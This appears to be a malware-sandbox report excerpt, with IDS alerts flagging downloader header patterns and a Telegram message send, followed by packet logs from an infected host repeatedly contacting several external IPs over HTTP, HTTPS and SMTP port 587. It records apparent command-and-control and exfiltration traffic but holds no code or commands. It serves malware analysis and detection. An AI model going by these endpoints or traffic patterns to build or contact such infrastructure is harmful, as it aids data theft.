2025-01-11T06:49:26.761020+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49883 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:27.651622+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49883 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:28.196656+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49893 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:28.932879+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49898 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:30.167266+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49906 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:33.261879+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49933 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:34.531438+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49943 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:37.046767+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49963 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:37.930589+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.9 | 49969 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Jan 11, 2025 06:49:13.635675907 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.635715008 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.763688087 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.763808966 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.763860941 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.764375925 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.770236015 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:13.775125980 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.775183916 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:13.775276899 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:13.779995918 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.401853085 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.404727936 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.404784918 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.404860973 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.405092001 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.405107975 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.448466063 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:14.870985985 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.872975111 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.873013973 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.017657995 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.017817974 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.017947912 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.018256903 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.022011995 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.023101091 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.027040005 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.027092934 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.027930021 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.027988911 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.028100967 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.032871962 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.689186096 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.690917015 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.691025972 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.691121101 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.691489935 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.691530943 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.729841948 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.154581070 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.156652927 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.156701088 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.289890051 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.289999962 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.290113926 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.290565014 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.294382095 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.295677900 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.299380064 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.300497055 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.300563097 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.300623894 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.300710917 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.305469990 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.931375980 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.960656881 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.960716963 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.960828066 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.961168051 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.961188078 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.979748011 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:17.418345928 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.420027018 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:17.420052052 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.567949057 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.568027973 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.568082094 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:17.571188927 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:17.575009108 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:17.576155901 CET4982180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:17.580001116 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.580054998 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:17.581017017 CET8049821193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.581083059 CET4982180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:17.581176996 CET4982180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:17.585915089 CET8049821193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.215591908 CET8049821193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.217026949 CET49826443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:18.217078924 CET44349826104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.217200041 CET49826443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:18.217530966 CET49826443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:18.217547894 CET44349826104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.265475035 CET4982180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:18.691081047 CET44349826104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.693034887 CET49826443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:18.693048000 CET44349826104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.840316057 CET44349826104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.840393066 CET44349826104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.840451002 CET49826443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:18.841147900 CET49826443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:18.845319033 CET4982180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:18.846553087 CET4983280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:18.850253105 CET8049821193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.850310087 CET4982180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:18.851320982 CET8049832193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:18.851382017 CET4983280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:18.851454020 CET4983280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:18.856218100 CET8049832193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:19.550322056 CET8049832193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:19.552388906 CET49839443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:19.552453041 CET44349839104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:19.552526951 CET49839443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:19.604794025 CET4983280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:19.621613979 CET49839443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:19.621659040 CET44349839104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.094824076 CET44349839104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.096812010 CET49839443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:20.096847057 CET44349839104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.233169079 CET44349839104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.233228922 CET44349839104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.233275890 CET49839443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:20.233711958 CET49839443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:20.256143093 CET4983280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:20.257980108 CET4984580192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:20.261193037 CET8049832193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.261244059 CET4983280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:20.262799025 CET8049845193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.262861967 CET4984580192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:20.262974024 CET4984580192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:20.267847061 CET8049845193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.904129982 CET8049845193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.905498981 CET49847443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:20.905530930 CET44349847104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.905596018 CET49847443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:20.905855894 CET49847443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:20.905874968 CET44349847104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:20.948498964 CET4984580192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:21.378362894 CET44349847104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:21.386194944 CET49847443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:21.386219978 CET44349847104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:21.526998043 CET44349847104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:21.527065992 CET44349847104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:21.527134895 CET49847443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:21.527777910 CET49847443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:21.545696020 CET4984580192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:21.550698996 CET8049845193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:21.550764084 CET4984580192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:21.553308010 CET49853443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:21.553361893 CET44349853149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:21.553419113 CET49853443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:21.553894043 CET49853443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:21.553909063 CET44349853149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:22.174267054 CET44349853149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:22.174525023 CET49853443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:22.176393986 CET49853443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:22.176412106 CET44349853149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:22.176670074 CET44349853149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:22.179584980 CET49853443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:22.223340988 CET44349853149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:22.457238913 CET44349853149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:22.457297087 CET44349853149.154.167.220192.168.2.9
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 11, 2025 06:49:22.462127924 CET  49853        443        192.168.2.9      149.154.167.220
Jan 11, 2025 06:49:22.538130999 CET  49853        443        192.168.2.9      149.154.167.220
Jan 11, 2025 06:49:25.892705917 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:25.897671938 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:25.897756100 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:25.898000002 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:25.902816057 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:26.523422003 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:26.527600050 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:26.532569885 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:26.714131117 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:26.751456976 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:26.751517057 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:26.751600981 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:26.756247997 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:26.756268978 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:26.761019945 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:27.236562967 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.236664057 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.238888979 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.238903999 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.239301920 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.292248964 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.295167923 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.335333109 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.405041933 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.405128002 CET  443          49888      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.405174971 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.408198118 CET  49888        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.411701918 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:27.416527033 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:27.597522974 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:27.600354910 CET  49893        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.600418091 CET  443          49893      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.600477934 CET  49893        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.600840092 CET  49893        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:27.600855112 CET  443          49893      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:27.651622057 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:28.054675102 CET  443          49893      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:28.079510927 CET  49893        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:28.079559088 CET  443          49893      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:28.196749926 CET  443          49893      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:28.196912050 CET  443          49893      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:28.197330952 CET  49893        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:28.197616100 CET  49893        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:28.241565943 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:28.246654034 CET  80           49883      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:28.246773005 CET  49883        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:28.247720957 CET  49898        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:28.252614975 CET  80           49898      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:28.252687931 CET  49898        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:28.252887964 CET  49898        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:28.257668018 CET  80           49898      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:28.392708063 CET  49782        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:28.876182079 CET  80           49898      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:28.878513098 CET  49902        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:28.878547907 CET  443          49902      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:28.878772974 CET  49902        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:28.879339933 CET  49902        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:28.879349947 CET  443          49902      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:28.932878971 CET  49898        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:29.044620037 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:29.049473047 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:29.049545050 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:29.357019901 CET  443          49902      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:29.358869076 CET  49902        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:29.358881950 CET  443          49902      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:29.482177973 CET  443          49902      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:29.482260942 CET  443          49902      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:29.482631922 CET  49902        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:29.482886076 CET  49902        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:29.486383915 CET  49898        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:29.487828970 CET  49906        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:29.491385937 CET  80           49898      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:29.491487026 CET  49898        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:29.492717028 CET  80           49906      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:29.492819071 CET  49906        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:29.493094921 CET  49906        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:29.497824907 CET  80           49906      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:29.621413946 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:29.624731064 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:29.629508972 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:29.742240906 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:29.751265049 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:29.756247997 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:29.869220972 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:29.869548082 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:29.874362946 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:30.118597984 CET  80           49906      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:30.119677067 CET  49912        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:30.119710922 CET  443          49912      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:30.119771004 CET  49912        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:30.119961977 CET  49912        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:30.119975090 CET  443          49912      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:30.167265892 CET  49906        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:30.595467091 CET  443          49912      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:30.597450972 CET  49912        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:30.597485065 CET  443          49912      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:30.737880945 CET  443          49912      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:30.737947941 CET  443          49912      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:30.738003016 CET  49912        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:30.738419056 CET  49912        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:30.742278099 CET  49917        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:30.747085094 CET  80           49917      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:30.747224092 CET  49917        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:30.747334957 CET  49917        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:30.752118111 CET  80           49917      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:31.382316113 CET  80           49917      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:31.383622885 CET  49922        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:31.383734941 CET  443          49922      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:31.383913040 CET  49922        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:31.384071112 CET  49922        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:31.384095907 CET  443          49922      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:31.433336020 CET  49917        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:31.847857952 CET  443          49922      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:31.849662066 CET  49922        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:31.849754095 CET  443          49922      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:32.002096891 CET  443          49922      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:32.002163887 CET  443          49922      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:32.002219915 CET  49922        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:32.003029108 CET  49922        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:32.010229111 CET  49917        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:32.011730909 CET  49928        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:32.016684055 CET  80           49917      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:32.016705036 CET  80           49928      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:32.016758919 CET  49917        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:32.016807079 CET  49928        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:32.022583008 CET  49928        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:32.027400970 CET  80           49928      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:32.663877010 CET  80           49928      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:32.667977095 CET  49933        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:32.668076038 CET  443          49933      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:32.668174028 CET  49933        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:32.668432951 CET  49933        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:32.668472052 CET  443          49933      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:32.714461088 CET  49928        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:33.136099100 CET  443          49933      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:33.138271093 CET  49933        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:33.138360023 CET  443          49933      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:33.261986017 CET  443          49933      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:33.262115002 CET  443          49933      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:33.262180090 CET  49933        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:33.262670994 CET  49933        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:33.265635014 CET  49928        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:33.266704082 CET  49938        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:33.270637989 CET  80           49928      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:33.270735979 CET  49928        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:33.271486998 CET  80           49938      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:33.271608114 CET  49938        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:33.271677017 CET  49938        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:33.276413918 CET  80           49938      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:33.393220901 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:33.397207975 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:33.402055979 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:33.519442081 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:33.519679070 CET  49904        587        192.168.2.9      3.130.71.34
